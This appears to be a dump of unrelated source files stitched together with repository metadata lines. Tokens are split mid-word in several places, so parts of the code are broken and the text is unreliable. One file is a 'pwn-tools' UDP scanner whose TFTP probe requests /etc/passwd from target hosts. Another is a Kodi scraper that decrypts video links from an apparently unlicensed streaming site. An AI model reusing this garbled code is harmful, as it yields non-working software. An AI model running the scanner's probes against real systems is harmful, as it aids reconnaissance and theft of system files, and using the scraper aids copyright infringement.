filename = Filename.temporary('', self.filename.getBasenameWoExtension(),
'.' + self.filename.getExtension(),
type = Filename.TDso)
filename.setExtension(self.filename.getExtension())
filename.setBinary()
sin = vfile.openReadFile(True)
sout = OFileStream()
if no |
nckx/dstat | plugins/dstat_vm_mem.py | Python | gpl-2.0 | 1,136 | 0.006162 | ### Author: Bert de Bruijn <bert+dstat$debruijn,be>
### VMware memory stats
### Displays memory stats coming from the hypervisor inside VMware VMs.
### The vmGuestLib API from | VMware Tools needs to be installed
class dstat_plugin(dstat):
def __init__(self):
self.name = 'vmware memory'
self.vars = ('active', 'balloone | d', 'mapped', 'swapped', 'used')
self.nick = ('active', 'balln', 'mappd', 'swapd', 'used')
self.type = 'd'
self.width = 5
self.scale = 1024
def check(self):
try:
global vmguestlib
import vmguestlib
self.gl = vmguestlib.VMGuestLib()
except:
raise Exception, 'Needs python-vmguestlib module'
def extract(self):
self.gl.UpdateInfo()
self.val['active'] = self.gl.GetMemActiveMB() * 1024 ** 2
self.val['ballooned'] = self.gl.GetMemBalloonedMB() * 1024 ** 2
self.val['mapped'] = self.gl.GetMemMappedMB() * 1024 ** 2
self.val['swapped'] = self.gl.GetMemSwappedMB() * 1024 ** 2
self.val['used'] = self.gl.GetMemUsedMB() * 1024 ** 2
# vim:ts=4:sw=4 |
dev-zzo/pwn-tools | scanners/udp-probe.py | Python | unlicense | 7,615 | 0.003414 | #!/usr/bin/python
"""
UDP Service Scanner version 0.1 by dev_zzo
This work has largely been inspired by:
https://github.com/portcullislabs/udp-proto-scanner
As is, this is more like a prober than scanner;
it operates using predefined probes for each known protocol.
"""
import argparse
import socket
import struct
import time
__scan_spec = (
# port, service name, probe
(53, 'DNSStatusRequest',
"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
(53, 'DNSVersionBindReq',
"\x00\x06\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x07\x76\x65\x72\x73\x69\x6f\x6e\x04\x62\x69\x6e\x64\x00\x00\x10\x00\x03"),
(69, 'tftp', "\x00\x01/etc/passwd\x00netascii\x00"),
(111, 'rpc',
"\x03\x9b\x65\x42\x00\x00\x00\x00\x00\x00\x00\x02\x00\x0f\x42\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
(111, 'RPCCheck',
"\x72\xFE\x1D\x13\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xA0\x00\x01\x97\x7C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
(123, 'ntp',
"\xcb\x00\x04\xfa\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbf\xbe\x70\x99\xcd\xb3\x40\x00"),
(123, 'NTPRequest',
"\xe3\x00\x04\xfa\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc5\x4f\x23\x4b\x71\xb1\x52\xf3"),
(137, 'NBTStat', "\x80\xf0\x00\x10\x00\x01\x00\x00\x00\x00\x00\x00\x20\x43\x4b\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x21\x00\x01"),
# SNMP v1 GetRequest PDU, with community=public
(161, 'SNMPv1GetRequest-public',
"\x30\x82\x00\x2f\x02\x01\x00\x04\x06\x70\x75\x62\x6c\x69\x63\xa0\x82\x00\x20\x02\x04\x4c\x33\xa7\x56\x02\x01\x00\x02\x01\x00\x30\x82\x00\x10\x30\x82\x00\x0c\x06\x08\x2b\x06\x01\x02\x01\x01\x05\x00\x05\x00"),
# SNMP v3 GetRequest PDU, no auth, no priv, contextEngineID=0, contextName=0
# Unlikely to work...
(161, 'SNMPv3GetRequest',
"\x30\x3a\x02\x01\x03\x30\x0f\x02\x02\x4a\x69\x02\x03\x00\xff\xe3\x04\x01\x04\x02\x01\x03\x04\x10\x30\x0e\x04\x00\x02\x01\x00\x02\x01\x00\x04\x00\x04\x00\x04\x00\x30\x12\x04\x00\x04\x00\xa0\x0c\x02\x02\x37\xf0\x02\x01\x00\x02\x01\x00\x30\x00"),
(177, 'xdmcp', "\x00\x01\x00\x02\x00\x01\x00\x00"),
(500, 'ike', "\x5b\x5e\x64\xc0\x3e\x99\xb5\x11\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00\x01\x50\x00\x00\x01\x34\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x01\x28\x01\x01\x00\x08\x03\x00\x00\x24\x01\x01"),
(523, 'db2', "DB2GETADDR\x00SQL08020"),
(1434, 'ms-sql', "\x02"),
(1434, 'ms-sql-slam', "\x0A"),
(1604, 'citrix', "\x1e\x00\x01\x30\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
(5405, 'net-support', "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
(6502, 'netop', "\xd6\x81\x81\x52\x00\x00\x00\xf3\x87\x4e\x01\x02\x32\x00\xa8\xc0\x00\x00\x01\x13\xc1\xd9\x04\xdd\x03\x7d\x00\x00\x0d\x00\x54\x48\x43\x54\x48\x43\x54\x48\x43\x54\x48\x43\x54\x48\x43\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x02\x32\x00\xa8\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
)
def ip2long(ipaddr):
return long(struct.unpack('!L', socket.inet_aton(ipaddr))[0])
def long2ip(ipaddr):
return socket.inet_ntoa(struct.pack('!L', ipaddr))
def __dump_bytes(data):
return ' '.join([('%02X' % ord(x)) for x in data])
def __dump_chars(data):
return ''.join([(x if 0x20 <= ord(x) < 0x80 else '.') for x in data])
def dump(data):
i = 0
lines = []
while i < len(data):
line = data[i:(i + 16)]
p1 = __dump_bytes(line[:8])
p2 = __dump_bytes(line[8:]) if len(line) > 8 else ''
lines.append('%08X %-24s %-24s %s' % (i, p1, p2, __dump_chars(line)))
i += 16
return "\n".join(lines)
def parse_targets(targets):
"Parse the target specs provided by the user"
results = []
for target_spec in targets:
if '/' in target_spec:
# a.b.c.d/m ?
net_addr, net_mask = target_spec.split('/')
net_addr = ip2long(net_addr)
net_mask = int(net_mask)
dev_mask = (1 << (32 - net_mask)) - 1
net_addr = net_addr & ~dev_mask
# First address is not allocated, last address is broadcast
for i in xrange(1, dev_mask):
addr = long2ip(net_addr + i)
results.append(addr)
elif '-' in target_spec:
# a.b.c.d-e.f.g.h ?
start_addr, end_addr = target_spec.split('-')
addr = ip2long(start_addr)
end_addr = ip2long(end_addr)
while addr <= end_addr:
add | r = long2ip(a)
results.append(addr)
addr += 1
else:
addr = ip2long(target_spec)
results.append(target_spec)
return results
def scan_main(args):
"Main scanning routine"
global __scan_spec
targets = parse_targets(args.targets)
responses = {}
print("Starting scan.")
s = socket.socket(socket.AF_INET, socket.SO | CK_DGRAM)
s.bind(('', 57022))
try:
for port, name, probe in __scan_spec:
print("Running probe '%s'..." % name)
s.settimeout(None)
for target in targets:
s.sendto(probe, (target, port))
s.settimeout(0.0)
# print("Waiting for replies...")
time.sleep(args.delay)
while True:
try:
response, addr = s.recvfrom(16384)
# print("Response from %s:%d" % addr)
try:
target_responses = responses[addr]
except KeyError:
target_responses = responses[addr] = {}
target_responses[name] = response
except socket.error as e:
# http://stackoverflow.com/a/2578794/1654774
# ICMP Port Unreachable can't be handled properly. :-(
if e.args[0] in (11, 10035):
break
if e.args[0] not in (10054):
raise
finally:
s.close()
print("Scan completed.")
for addr, target_responses in responses.iteritems():
print('')
print('=' * 76)
print("Report for %s:" % addr[0])
print('=' * 76)
for name, response in target_responses.iteritems():
print('')
print("Probe: %s, port: %d" % (name, addr[1]))
print(dump(response))
def __main():
print('\nUDP Service Scanner version 0.1\n')
parser = argparse.ArgumentParser(description='UDP Service Scanner')
parser.add_argument('targets', metavar='target', nargs='+',
help='IP address or range (ip/mask, ip-ip)')
parser.add_argument('--delay',
type=float,
default=1.0,
help='Time to wait (seconds) before moving on to the next probe')
args = parser.parse_args()
scan_main(args)
if __name__ == '__main__':
__main()
|
DailyActie/Surrogate-Model | 01-codes/OpenMDAO-Framework-dev/openmdao.util/src/openmdao/util/__init__.py | Python | mit | 137 | 0.007299 | """
This package contains a number of utilities that are used inside o | f openmdao.
It does n | ot depend on any other openmdao package.
"""
|
rfugger/villagescc | cc/relate/views.py | Python | agpl-3.0 | 5,122 | 0.002148 | from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404
from django.http import HttpResponseRedirect, Http404
from django.db.models import Q
from django.contrib import messages
from cc.general.util import render
import cc.ripple.api as ripple
from cc.profile.models import Profile
from cc.relate.forms import EndorseForm, AcknowledgementForm
from cc.relate.models import Endorsement
from cc.feed.models import FeedItem
from cc.general.mail import send_notification
from django.utils.translation import ugettext as _
MESSAGES = {
'endorsement_saved': _("Endorsement saved."),
'endorsement_deleted': _("Endorsement deleted."),
'acknowledgement_sent': _("Acknowledgement sent."),
}
@login_required
@render()
def endorse_user(request, recipient_username):
recipient = get_object_or_404(Profile, user__username=recipient_username)
if recipient == request.profile:
raise Http404()
try:
endorsement = Endorsement.objects.get(
endorser=request.profile, recipient=recipient)
except Endorsement.DoesNotExist:
endorsement = None
if request.method == 'POST':
if 'delete' in request.POST and endorsement:
endorsement.delete()
messages.info(request, MESSAGES['endorsement_deleted'])
return HttpResponseRedirect(
endorsement.recipient.get_absolute_url())
form = EndorseForm(request.POST, instance=endorsement,
endorser=request.profile, recipient=recipient)
if form.is_valid():
is_new = endorsement is None
endorsement = form.save()
if is_new:
send_endorsement_notification(endorsement)
messages.info(request, MESSAGES['endorsement_saved'])
return HttpResponseRedirect(endorsement.get_absolute_url())
else:
form = EndorseForm(instance=endorsement, endorser=request.profile,
recipient=recipient)
profile = recipient # For profile_base.html.
return locals()
def send_endorsement_notification(endorsement):
subject = _("%s has endorsed you on Villages.cc") % endorsement.endorser
send_notification(subject, endorsement.endorser, endorsement.recipient,
'endorsement_notification_email.txt',
{'endorsement': endorsement})
@login_required
@render()
def endorsement(request, endorsement_id):
endorsement = get_object_or_404(Endorsement, pk=endorsement_id)
return locals()
@login_required
@render()
def relationships(request):
accounts = ripple.get_user_accounts(request.profile)
return locals()
@login_required
@render()
def relationship(request, partner_username):
partner = get_object_or_404(Profile, user__username=partner_username)
if partner == request.profile:
raise Http404 # Can't have relationship with yourself.
account = request.profile.account(partner)
if account:
entries = account.entries
balance = account.balance
else:
entries = []
balance = 0
profile = partner # For profile_base.html.
return locals()
@login_required
@render()
def acknowledge_user(request, recipient_username):
recipient = get_object_or_404(Profile, user__username=recipient_username)
if recipient == request.profile:
raise Http404
# TODO: Don't recompute max_amount on form submit? Cache, or put in form
# as hidden field?
max_amount = ripple.max_payment(request.profile, recipient)
if request.method == 'POST': |
form = AcknowledgementForm(request.POST, max_ripple=max_amount)
if form.is_valid():
| acknowledgement = form.send_acknowledgement(
request.profile, recipient)
send_acknowledgement_notification(acknowledgement)
messages.info(request, MESSAGES['acknowledgement_sent'])
return HttpResponseRedirect(acknowledgement.get_absolute_url())
else:
form = AcknowledgementForm(max_ripple=max_amount, initial=request.GET)
can_ripple = max_amount > 0
profile = recipient # For profile_base.html.
return locals()
def send_acknowledgement_notification(acknowledgement):
subject = _("%s has acknowledged you on Villages.cc") % (
acknowledgement.payer)
send_notification(subject, acknowledgement.payer, acknowledgement.recipient,
'acknowledgement_notification_email.txt',
{'acknowledgement': acknowledgement})
@login_required
@render()
def view_acknowledgement(request, payment_id):
try:
payment = ripple.get_payment(payment_id)
except ripple.RipplePayment.DoesNotExist:
raise Http404
entries = payment.entries_for_user(request.profile)
if not entries:
raise Http404 # Non-participants don't get to see anything.
sent_entries = []
received_entries = []
for entry in entries:
if entry.amount < 0:
sent_entries.append(entry)
else:
received_entries.append(entry)
return locals()
|
tdlong/YeastRobot | UserPrograms/ASE/Mon_ToBeads_3.py | Python | gpl-3.0 | 2,655 | 0.050094 | import sys
# where RobotControl.py, etc lives
sys.path.append('/home/pi/Desktop/ADL/YeastRobot/PythonLibrary')
from RobotControl import *
#################################
### Define Deck Layout
#################################
deck="""\
DW96P DW96P DW96W DW96W BLANK
DW96P DW96P DW96W DW96W BLANK
DW96P DW96P DW96W DW96W BLANK
BLANK BLANK BLANK BLANK BLANK
"""
# 2 3 4 5 6
# note the 1st user defined column is "2" not zero or one, since tips are at 0 & 1
# This takes ~36m to run in total
##################################
# Assume there is a Pellet in each well
OffsetDict={0: 'UL', 1: 'UR', 2: 'LL', 3: 'LR'}
# read in deck, etc
DefineDeck(deck)
printDeck()
InitializeRobot()
CurrentTipPosition = 1
for row in [0,1,2]:
for offset in [0,1,2,3]:
#get tips
CurrentTipPosition = retrieveTips(CurrentTipPosition)
extraSeatTips()
adjusted_depth = 94 + row
#aspirate 2 x 250 ul of Tween20 (C2) -> discard to DW96W at C4 X2
position(row,2,position = OffsetDict[offset])
aspirate(300,depth=adjusted_depth - 4,speed=50, mix=0)
position(row,4, position = OffsetDict[offset])
dispense(300, depth=adjusted_depth - 18, speed=50)
position(row,2,position = OffsetDict[offset])
aspirate(250,depth=adjusted_depth + 2,speed=50, mix=0)
position(row,4, position = OffsetDict[offset])
dispense(250, depth=adjusted_depth - 28, speed=50)
# | pick up 2 * 200ul of SDS from C5, add to C2
position(row,5,position = OffsetDict[offset])
aspirate(200,depth=adjusted_dept | h + 2,speed=50, mix=0)
position(row,2,position = OffsetDict[offset])
dispense(200, depth=adjusted_depth + 3, speed=100)
position(row,5,position = OffsetDict[offset])
aspirate(200,depth=adjusted_depth + 2,speed=50, mix=0)
position(row,2,position = OffsetDict[offset])
dispense(200, depth=adjusted_depth - 2, speed=100)
# initial mix
position(row,2,position = OffsetDict[offset])
mix(300,adjusted_depth - 4,100,5)
# 2 * 200 being careful of beads preloaded in 96 well plate
# from DW96 to DW96 loaded with beads
position(row,2,position = OffsetDict[offset])
aspirate(200, depth=adjusted_depth + 1,speed=50, mix=0)
position(row,3,position = OffsetDict[offset])
dispense(200, depth=adjusted_depth - 25, speed=50)
position(row,2,position = OffsetDict[offset])
mix(300,adjusted_depth + 5,100,5)
position(row,2,position = OffsetDict[offset])
aspirate(200, depth=adjusted_depth + 6,speed=50, mix=0)
position(row,3,position = OffsetDict[offset])
dispense(200, depth=adjusted_depth - 39, speed=50)
#disposeTips()
manualDisposeTips()
position(0,0)
ShutDownRobot()
quit()
|
migueldiascosta/easybuild-framework | easybuild/toolchains/gmpich2.py | Python | gpl-2.0 | 1,420 | 0.001408 | ##
# Copyright 2012-2017 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is dist | ributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a co | py of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for gmpich2 compiler toolchain (includes GCC and MPICH2).
:author: Kenneth Hoste (Ghent University)
"""
from easybuild.toolchains.gcc import GccToolchain
from easybuild.toolchains.mpi.mpich2 import Mpich2
class Gmpich2(GccToolchain, Mpich2):
"""Compiler toolchain with GCC and MPICH2."""
NAME = 'gmpich2'
SUBTOOLCHAIN = GccToolchain.NAME
|
amwelch/a10sdk-python | a10sdk/core/ip/ip_dns_suffix.py | Python | apache-2.0 | 1,146 | 0.010471 | from a10sdk.common.A10BaseClass import A10BaseClass
class Suffix(A10BaseClass):
"""Class Description::
DNS suffix.
Class suffix supports CRUD Operations and inherits from `common | /A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param domain_name: {"description": "DNS suf | fix", "format": "string", "minLength": 1, "optional": true, "maxLength": 32, "type": "string"}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/ip/dns/suffix`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "suffix"
self.a10_url="/axapi/v3/ip/dns/suffix"
self.DeviceProxy = ""
self.domain_name = ""
self.uuid = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
|
magic0704/oslo.db | oslo_db/sqlalchemy/models.py | Python | apache-2.0 | 4,841 | 0 | # Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Piston Cloud Computing, Inc.
# Copyright 2012 Cloudscaling Group, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or imp | lied. See the
# License for the specific language governing permissions and limitations
# under | the License.
"""
SQLAlchemy models.
"""
import six
from oslo_utils import timeutils
from sqlalchemy import Column, Integer
from sqlalchemy import DateTime
from sqlalchemy.orm import object_mapper
class ModelBase(six.Iterator):
"""Base class for models."""
__table_initialized__ = False
def save(self, session):
"""Save this object."""
# NOTE(boris-42): This part of code should be look like:
# session.add(self)
# session.flush()
# But there is a bug in sqlalchemy and eventlet that
# raises NoneType exception if there is no running
# transaction and rollback is called. As long as
# sqlalchemy has this bug we have to create transaction
# explicitly.
with session.begin(subtransactions=True):
session.add(self)
session.flush()
def __setitem__(self, key, value):
setattr(self, key, value)
def __getitem__(self, key):
return getattr(self, key)
def __contains__(self, key):
# Don't use hasattr() because hasattr() catches any exception, not only
# AttributeError. We want to passthrough SQLAlchemy exceptions
# (ex: sqlalchemy.orm.exc.DetachedInstanceError).
try:
getattr(self, key)
except AttributeError:
return False
else:
return True
def get(self, key, default=None):
return getattr(self, key, default)
@property
def _extra_keys(self):
"""Specifies custom fields
Subclasses can override this property to return a list
of custom fields that should be included in their dict
representation.
For reference check tests/db/sqlalchemy/test_models.py
"""
return []
def __iter__(self):
columns = list(dict(object_mapper(self).columns).keys())
# NOTE(russellb): Allow models to specify other keys that can be looked
# up, beyond the actual db columns. An example would be the 'name'
# property for an Instance.
columns.extend(self._extra_keys)
return ModelIterator(self, iter(columns))
def update(self, values):
"""Make the model object behave like a dict."""
for k, v in six.iteritems(values):
setattr(self, k, v)
def _as_dict(self):
"""Make the model object behave like a dict.
Includes attributes from joins.
"""
local = dict((key, value) for key, value in self)
joined = dict([(k, v) for k, v in six.iteritems(self.__dict__)
if not k[0] == '_'])
local.update(joined)
return local
def iteritems(self):
"""Make the model object behave like a dict."""
return six.iteritems(self._as_dict())
def items(self):
"""Make the model object behave like a dict."""
return self._as_dict().items()
def keys(self):
"""Make the model object behave like a dict."""
return [key for key, value in self.iteritems()]
class ModelIterator(six.Iterator):
def __init__(self, model, columns):
self.model = model
self.i = columns
def __iter__(self):
return self
# In Python 3, __next__() has replaced next().
def __next__(self):
n = six.advance_iterator(self.i)
return n, getattr(self.model, n)
class TimestampMixin(object):
created_at = Column(DateTime, default=lambda: timeutils.utcnow())
updated_at = Column(DateTime, onupdate=lambda: timeutils.utcnow())
class SoftDeleteMixin(object):
deleted_at = Column(DateTime)
deleted = Column(Integer, default=0)
def soft_delete(self, session):
"""Mark this object as deleted."""
self.deleted = self.id
self.deleted_at = timeutils.utcnow()
self.save(session=session)
|
avocadoinnocenceproject/farflungfruit | render.py | Python | mit | 303 | 0.006601 | from jinja2 import Template
import codecs
def render(file, props=None):
if props == None:
return '404'
with | codecs.open('./views/' + file + '.html', 'r', encoding='utf8') as f:
content = f.read()
templated = Template(content).render(props)
return templ | ated
|
zstars/weblabdeusto | server/admin/cli/migrate_db_40m1_to_50/migrationlib.py | Python | bsd-2-clause | 4,717 | 0.007844 | import sys, os
sys.path.append(os.sep.join(("..","..","..","src")))
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import traceback
import MySQLdb as dbi
import weblab.db.model as Model
########################################################
#
# Abstract class. All classes implementing this class
# will provide a "check" method, which will focus on
# checking if the patch must be applied or it has already
# been applied, and a method "apply" which will work
# in case the patch had not been applied.
#
class Patch(object):
ABSTRACT = False
SQL_FORMAT = 'SQL'
SQLALCHEMY_FORMAT = 'sqlalchemy'
CHECK_FORMAT = SQL_FORMAT
APPLY_FORMAT = SQL_FORMAT
def __init__(self, user, password, db):
self.user = user
self.db = db
self.password = password
def execute(self):
connection_url = "mysql://%(USER)s:%(PASS)s@%(HOST)s/%(NAME)s" % {
"USER": self.user,
"PASS": self.password,
"HOST": "localhost",
"NAME": self.db }
self.engine = create_engine(connection_url, convert_unicode=True, echo=False)
Session = sessionmaker(bind=self.engine)
session = Session()
try:
connection = dbi.connect(host="localhost", user=self.user, passwd=self.password, db=self.db)
try:
cursor = connection.cursor()
try:
print "Checking %s..." % type(self).__name__,
if self.CHECK_FORMAT == self.SQL_FORMAT:
check_arg = cursor
else:
check_arg = session
try:
applicable = self.check(check_arg)
except:
print "[ERROR CHECKING]"
print
traceback.print_exc()
print
applicable = False
if applicable:
print "[NOT APPLIED]"
print "Applying %s..." % type(self).__name__,
try:
if self.APPLY_FORMAT == self.SQL_FORMAT:
self.apply(cursor)
connection.commit()
else:
self.apply(session)
session.commit()
except:
print "[FAIL]"
print
traceback.print_exc()
print
else:
print "[OK]"
else:
print "[already applied]"
finally:
cursor.close()
finally:
connection.close()
finally:
session.close()
def check(self, cursor):
raise UnimplementedError("Not implemented!")
def apply(self, cursor):
raise UnimplementedError("Not implemented!")
class PatchApplier(object):
def __init__(self, user, password, dbs, order):
self.user = user
self.password = password
if isinstance(dbs, basestring):
self.dbs = [dbs]
else:
self.dbs = dbs
self.order = order
def execute(self, force = False):
for klass in Patch.__subclasses__():
if not klass.ABSTRACT and not klass in self.order:
print "WARNING: Class %s not found in provided order: " % klass.__name__,
if force:
print "[skipped]"
else:
print "[aborted]"
raise Exception("Class %s not found in provided order. Call execute(force=True) if this is correct" % klass.__name__)
for db in self.dbs:
print "Applying patches to %s" % db
# Always recreate all the tables
connection_url = "mysql://%(USER)s:%(PASS)s@%(HOST)s/%(NAME)s" % {
"USER": self.user,
"PASS": self.password,
"HOST": "localhost",
| "NAME": db }
engine = create_engine(connection_url, convert_unicode=True, echo=False)
Model.Base.metadata.create_all(engine)
for klass in self.order:
fix = klass(self.user, self.password, db)
fix.exec | ute()
|
USGSDenverPychron/pychron | pychron/hardware/newport/newport_group.py | Python | apache-2.0 | 2,866 | 0.000349 | # ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from traits.api import Float, Tuple
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.core.helpers.strtools import csv_to_ints
from pychron.hardware.axis import Axis
MAP | PING = dict(
acceleration="HA",
deceleration="HD",
# emergency_deceleration = 'HE',
jerk="HJ",
velocity="HV",
axes="HN",
)
class NewportGroup(Axis):
# acceleration = Float
# deceleration = Float
emergency_deceleration = None
jerk = Float
# velocity = Float
name = "GroupedAxes"
machine_velocity = Float
machine_acceleration = Float
machine_decele | ration = Float
axes = Tuple
# calculate_parameters = Bool(True)
id = None
def _set_acceleration(self, v):
self._acceleration = v
def _set_deceleration(self, v):
self._deceleration = v
def _set_velocity(self, v):
self._velocity = v
def load(self, path):
config = self.get_configuration(path)
for attr in [
"acceleration",
"deceleration",
# 'emergency_deceleration',
"jerk",
"velocity",
]:
self.set_attribute(config, attr, "General", attr, cast="float")
self.set_attribute(config, "id", "General", "id", cast="int")
axes = self.config_get(config, "General", "axes")
self.axes = tuple(csv_to_ints(axes))
self.nominal_velocity = self.velocity
self.nominal_acceleration = self.acceleration
self.nominal_deceleration = self.deceleration
def build_command(self, new_group):
cmds = []
for key, value in MAPPING.items():
if key is not "axes":
cmds.append("{}{}{:0.5f}".format(self.id, value, getattr(self, key)))
if new_group:
gid = "{:n}HN{}".format(self.id, ",".join(map(str, self.axes)))
cmds = [gid] + cmds
return ";".join(cmds)
# ============= EOF ==============================================
|
obsoleter/suds | suds/umx/__init__.py | Python | lgpl-3.0 | 1,849 | 0.002704 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
"""
Provides modules containing classes to support
unmarshalling (XML).
"""
from suds.sudsobject import Object
class Content(Object):
"""
@ivar node: The content source node.
@type node: L{sax.element.Element}
@ivar data: The (optional) content data.
@type data: L{Object}
@ivar text: The (optional) content (xml) text.
@type text: basestring
"""
extensions = []
def __init__( | self, node, **kwargs):
Object.__init__(self)
self.node = node
self.data = None
self.text = None
for k,v in list(kwargs.items()):
setattr(s | elf, k, v)
def __getattr__(self, name):
if name not in self.__dict__:
if name in self.extensions:
v = None
setattr(self, name, v)
else:
raise AttributeError('Content has no attribute %s' % name)
else:
v = self.__dict__[name]
return v |
RuiNascimento/krepo | script.module.lambdascrapers/lib/lambdascrapers/sources_placenta/en_placenta-1.7.8/to_be_fixed/needsfixing/vumoo.py | Python | gpl-2.0 | 7,170 | 0.004045 | # -*- coding: UTF-8 -*-
#######################################################################
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# @Daddy_Blamo wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return. - Muad'Dib
# ----------------------------------------------------------------------------
#######################################################################
# Addon Name: Placenta
# Addon id: plugin.video.placenta
# Addon Provider: Mr.Blamo
import urlparse,urllib,json,base64,hashlib,re,xbmc
from resources.lib.modules import client
from resources.lib.modules import cleantitle
from resources.lib.modules import source_utils
from resources.lib.modules import directstream
from resources.lib.modules import pyaes
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['vumoo.to']
self.base_link = 'http://vumoo.to/'
self.cdn_link = 'http://cdn.123moviesapp.net'
self.search_path = '/search?q=%s'
self.password = 'iso10126'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = {'title': title, 'year': year, 'imdb': imdb}
return urllib.urlencode(url)
except Exception:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
data = {'tvshowtitle': tvshowtitle, 'year': year, 'imdb': imdb}
return urllib.urlencode(data)
except Exception:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
data = urlparse.parse_qs(url)
data = dict((i, data[i][0]) for i in data)
data.update({'season': season, 'episode': episode, 'title': title, 'premiered': premiered})
return urllib.urlencode(data)
except Exception:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
data = urlparse.parse_qs(url)
data = dict((i, data[i][0]) for i in data)
if 'tvshowtitle' in data:
urls = self.__get_episode_urls(data)
else:
urls = self.__get_movie_urls(data)
for url in urls:
response = client.request(url)
encrypted = re.findall('embedVal="(.+?)"', response)[0]
decrypted = self.__decrypt(encrypted)
storage = json.loads(decrypted)
for location in storage['videos']:
if 'sources' in location:
for source in location['sources']:
try:
link = source['file']
if 'google' in link or 'blogspot' in link:
quality = directstream.googletag(link)[0]['quality']
if 'lh3.googleusercontent' in link:
link = directstream.googleproxy(link)
sources.append({
'source': 'gvideo',
'quality': quality,
'language': 'en',
'url': link,
'direct': True,
'debridonly': False
})
else:
continue
except Exception:
continue
